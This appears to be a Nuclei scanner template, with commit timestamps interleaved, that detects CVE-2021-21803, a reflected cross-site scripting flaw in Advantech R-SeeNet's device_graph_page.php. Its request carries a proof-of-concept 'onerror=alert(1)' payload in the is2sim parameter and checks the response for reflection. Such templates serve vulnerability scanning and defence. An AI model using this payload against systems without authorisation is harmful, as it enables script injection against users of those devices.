2021-07-18 13:12:01 +00:00
id : CVE-2021-21803
info :
2022-09-08 13:28:46 +00:00
name : Advantech R-SeeNet - Cross-Site Scripting
2021-07-18 13:12:01 +00:00
author : gy741
severity : medium
2022-09-08 13:28:46 +00:00
description : Advantech R-SeeNet is vulnerable to cross-site scripting via the device_graph_page.php script via the is2sim parameter. A specially crafted URL by an attacker and visited by a victim can lead to arbitrary JavaScript code execution.
2022-04-22 10:38:41 +00:00
reference :
- https://talosintelligence.com/vulnerability_reports/TALOS-2021-1272
2022-09-08 13:28:46 +00:00
- https://nvd.nist.gov/vuln/detail/CVE-2021-21803
2021-09-10 11:26:40 +00:00
classification :
cvss-metrics : CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
2022-04-22 10:38:41 +00:00
cvss-score : 6.1
2021-09-10 11:26:40 +00:00
cve-id : CVE-2021-21803
cwe-id : CWE-79
2022-04-22 10:38:41 +00:00
tags : cve,cve2021,rseenet,xss
2021-07-18 13:12:01 +00:00
requests :
- method : GET
path :
- '{{BaseURL}}/php/device_graph_page.php?is2sim=%22zlo%20onerror=alert(1)%20%22'
matchers-condition : and
matchers :
- type : word
words :
- '"zlo onerror=alert(1) "'
2021-07-18 17:44:19 +00:00
- 'Device Status Graph'
2021-07-18 13:12:01 +00:00
part : body
2021-07-18 17:44:19 +00:00
condition : and
2021-07-18 13:12:01 +00:00
- type : word
part : header
words :
- text/html
- type : status
status :
- 200
2022-09-08 13:28:46 +00:00
# Enhanced by mp on 2022/09/02